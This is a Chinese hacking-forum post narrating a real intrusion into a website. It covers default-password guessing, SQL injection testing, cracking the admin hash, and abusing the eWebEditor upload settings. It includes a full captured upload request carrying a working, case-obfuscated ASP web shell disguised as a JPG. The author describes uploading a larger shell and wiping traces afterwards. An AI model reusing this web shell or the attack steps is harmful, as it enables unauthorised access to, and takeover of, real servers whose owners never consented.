记一次入侵检测过程

强子

发一个入侵网站的过程..

登入网站.. 页面不错. 有点韩国的感觉.. 大量的flash 很漂亮..


我习惯先找下后台的地址.. 随手在地址后面加入admin

地址就不写了  免得有人....挂马,挂黑夜.(bs下挂马的..)



随手测试原始密码

admin admin

admin admin888

不行的 (你都当别人是傻子呢? )

看来要弄到数据库来.. 看看  暴库可以不? inc%23/coon.asp 可惜没有那懂  (估计现在有的很少了.)

还是注入吧.. 找个 asp?id=

之类的看看.  随手找到一个  二话不说  加入 and 1=1



哦 买噶...  放注入..   记得朋友 那天晚上(跟cwz小组群一样一个比较淫荡的人看名字就知道)可以不用 工具绕过去..但是给

我的命令 有 几k大小的 txt  (可想而知有多少命令了.)  我还是用我的 土办法的  打开虚拟机. 2003 server



拉上工具 中转注入..


http://127.0.0.1/XX.asp?id= 22 and 1=1 正常

http://127.0.0.1/XX.asp?id= 22  and 1=2 不正常

拿出工具啊D 跑跑 ..


到 md5网站加密  拿着密码  二话不说 去后台..


登入成功 没有  数据库 备份  挺郁闷. .  有添加产品..

抓包吧..

数据如下

POST /Upfile_Photo.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.XXXXXXXXXX./upload_Photo.asp?PhotoUrlID=6
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d919639300d0
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MAXTHON 2.0)
Host: www.XXXXXXXX.com
Content-Length: 4931
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQCCTTDRA=EDMEONHCAJNDKHHMOCMCBM
第2段
-----------------------------7d919639300d0
Content-Disposition: form-data; name="FileName"; filename="E:\工具备份\简单脚本\cwzxiaoma.jpg"
Content-Type: text/html

<htmL xmLnS:v>
<hEAd>
<titLE>ｃＷｚ-安全小组.专用小马....</titLE>
<mEtA http-EqUiv='cOntEnt-tYpE' cOntEnt='tExt/htmL; chARSEt=gB2312' />
<mEtA nAmE='AUthOR' cOntEnt='uploadvirus(At)Gmail.cOm' />
<mEtA nAmE='cOpYRight' cOntEnt='http://bbs.16kc.net/?fromuid=1856' />
<mEtA nAmE='gEnERAtOR' cOntEnt='EditpLUS2.11' />
<mEtA nAmE='USEFOR' cOntEnt='AppLicAtiOn tERminAtiOn' />
<bgsound src="http://www.4ewz.com/mymusic191/wma/music/190.mp3" loop="-1">
<!-- nO jUmp -->
<StYLE REL='StYLEShEEt'>
v\:*    {
   BEhAviOR:URL(#dEFAULt#vmL);
}
BOdY, div, SpAn, Li, td, A {
   cOLOR: #666666;
   FOnt-SizE: 12px !impORtAnt;
   FOnt-SizE: 11px;
   FOnt-FAmiLY: tAhOmA, ARiAL, 'cOURiER nEw', vERdAnA, SAnS-SERiF;
   LinE-hEight: 19px;
}
A {
   cOLOR: #444444;
   tExt-dEcORAtiOn: nOnE;
}
A:hOvER {
   cOLOR: REd;
   tExt-dEcORAtiOn: nOnE;
}
.StYLE1 {cOLOR: #000000}
.style2 {color: #FF0000}
.style3 {color: #0000FF}
.style4 {color: #9900CC}
</StYLE>
</hEAd>
<BOdY StYLE='tExt-ALign:cEntER;mARgin:90px 20px 50px 20px'>

<div StYLE='mARgin:AUtO; width:450px; tExt-ALign:cEntER'>
   <v:ROUndREct StYLE='tExt-ALign:LEFt; diSpLAY:tABLE; mARgin:AUtO; pAdding:15px; width:750px; hEight:510px; OvERFLOw:hiddEn; pOSitiOn:RELAtivE;' ARcSizE='3200F' cOORdSizE='21600,21600' FiLLcOLOR='#FdFdFd' StROkEcOLOR='#E6E6E6' StROkEwEight='1px'>
       <tABLE width='100%' cELLpAdding='0' cELLSpAcing='0' BORdER='0' StYLE='pAdding-BOttOm:6px; BORdER-BOttOm:1px #E3E3E3 SOLid'>
           <tR>
               <td><B>ｃＷｚ-安全小组.专用小马....        <a href="http://bbs.16kc.net/?fromuid=1856">更多精品尽在16KC.net</a></B></td>
               <td ALign='Right' StYLE='cOLOR:#F8F8F8'><SpAn cLASS="StYLE1">http://bbs.16kc.net</SpAn></td>
           </tR>
       </tABLE>
       <tABLE width='100%' cELLpAdding='0' cELLSpAcing='0' BORdER='0' StYLE='pAdding-BOttOm:6px; BORdER-BOttOm:1px #E3E3E3 SOLid'>
      <tR>
        <td>         <% dim OBjFSO %>         <% dim FdAtA %>         <% dim OBjcOUntFiLE %>         <% On ERROR RESUmE nExt %>         <% SEt OBjFSO = SERvER.cREAtEOBjEct("ScR"&ABc&"ipting.FiLESYStEmOBjEct") %>         <% iF tRim(REqUESt("SYFdpAth"))<>"" thEn %>         <% FdAtA = REqUESt("cYFddAtA") %>         <% SEt OBjcOUntFiLE=OBjFSO.cREAtEtExtFiLE(REqUESt("SYFdpAth"),tRUE) %>         <% OBjcOUntFiLE.wRitE FdAtA %>         <% iF ERR =0 thEn %>         <% RESpOnSE.wRitE "<FOnt cOLOR=REd>保存成功!</FOnt>" %>         <% ELSE %>         <% RESpOnSE.wRitE "<FOnt cOLOR=REd>保存失败!</FOnt>" %>         <% End iF %>         <% ERR.cLEAR %>         <% End iF %>         <% OBjcOUntFiLE.cLOSE %>         <% SEt OBjcOUntFiLE=nOthing %>         <% SEt OBjFSO = nOthing %>         <% RESpOnSE.wRitE "<FORm ActiOn='' mEthOd=pOSt>" %>         <% RESpOnSE.wRitE "保存文件的<FOnt cOLOR=REd>绝对路径(包括文件名:如d:\wEB\x.ASp):</FOnt>" %>         <% RESpOnSE.wRitE "<inpUt tYpE=tExt nAmE=SYFdpAth width=32 SizE=50>" %>         <% RESpOnSE.wRitE "<BR>" %>         <% RESpOnSE.wRitE "本文件绝对路径" %>         <% =SERvER.mAppAth(REqUESt.SERvERvARiABLES("ScRipt_nAmE")) %>         <% RESpOnSE.wRitE "<BR>" %>         <% RESpOnSE.wRitE "输入马的内容:" %>         <% RESpOnSE.wRitE "<tExtAREA nAmE=cYFddAtA cOLS=80 ROwS=10 width=32></tExtAREA>" %>         <% RESpOnSE.wRitE "<inpUt tYpE=SUBmit vALUE=保存>" %>         <% RESpOnSE.wRitE "</FORm>" %>
        <div ALign="LEFt"></div></td>
      </tR>
    </tABLE>
       <tABLE width='100%' cELLpAdding='0' cELLSpAcing='0' BORdER='0'>
           <tR>
               <td width='80' vALign='tOp' StYLE='pAdding-tOp:13px'><SpAn StYLE='FOnt-SizE:16px; zOOm:4; cOLOR:#AAAAAA'><FOnt FAcE='wEBdingS'>i</FOnt></SpAn></td>
               <td vALign='tOp' StYLE='pAdding-tOp:17px'><Li class="style2">ｃＷｚ-安全小组.专用小马....</Li>
    <Li class="style3">此程序仅供学习和研究 请勿用于非法途径</Li>
<Li class="style3">ｃＷｚ-安全小组－１　　74806152</Li>
<Li class="style3">ｃＷｚ-安全小组－２　　74806301</Li>
<Li class="style3">学习网站入侵的好群。普及网站安全知识。</Li>
<Li class="style3">挂马zhe请呈椭圆离开。</Li>
    <Li>
   <v:ROUndREct StYLE='tExt-ALign:LEFt; diSpLAY:tABLE; OvERFLOw:hiddEn; ' ARcSizE='3200F' cOORdSizE='21600,21600' FiLLcOLOR='#FdFdFd' StROkEcOLOR='#E6E6E6' StROkEwEight='1px'><span class="style4">
          请遵守国家法律 由此带来的一切后果一律于本群无关</span></v:ROUndREct></Li>
   
            </td>
           </tR>
       </tABLE>
   </v:ROUndREct>
</div>
</BOdY>
</htmL>

-----------------------------7d919639300d0
Content-Disposition: form-data; name="Submit"

上传
-----------------------------7d919639300d0
Content-Disposition: form-data; name="PhotoUrlID"

6
-----------------------------7d919639300d0--

好像是不能改  找不到目录  希望有刚高手能告诉我下  改包 我也只会 那一种  nc 的功能应该是很强大了

还有更淫荡的办法希望 回帖..

这是看


让我想到了 那天看的一个教程 设置.. ew的   admin_style.asp 设置上传asp 再看下教程(那时候 没仔细看... )

右键查找


找到ew路径 加上  admin_style.asp


加上  asa 提交 再 上传直接传 asa ..


确定. 上传完毕   嘿嘿兴奋 看看 代码源代码   哈哈  很兴奋了..


快转到小马 看看


嘿嘿上传大马..

把尾巴清理下




提示下管理员吧.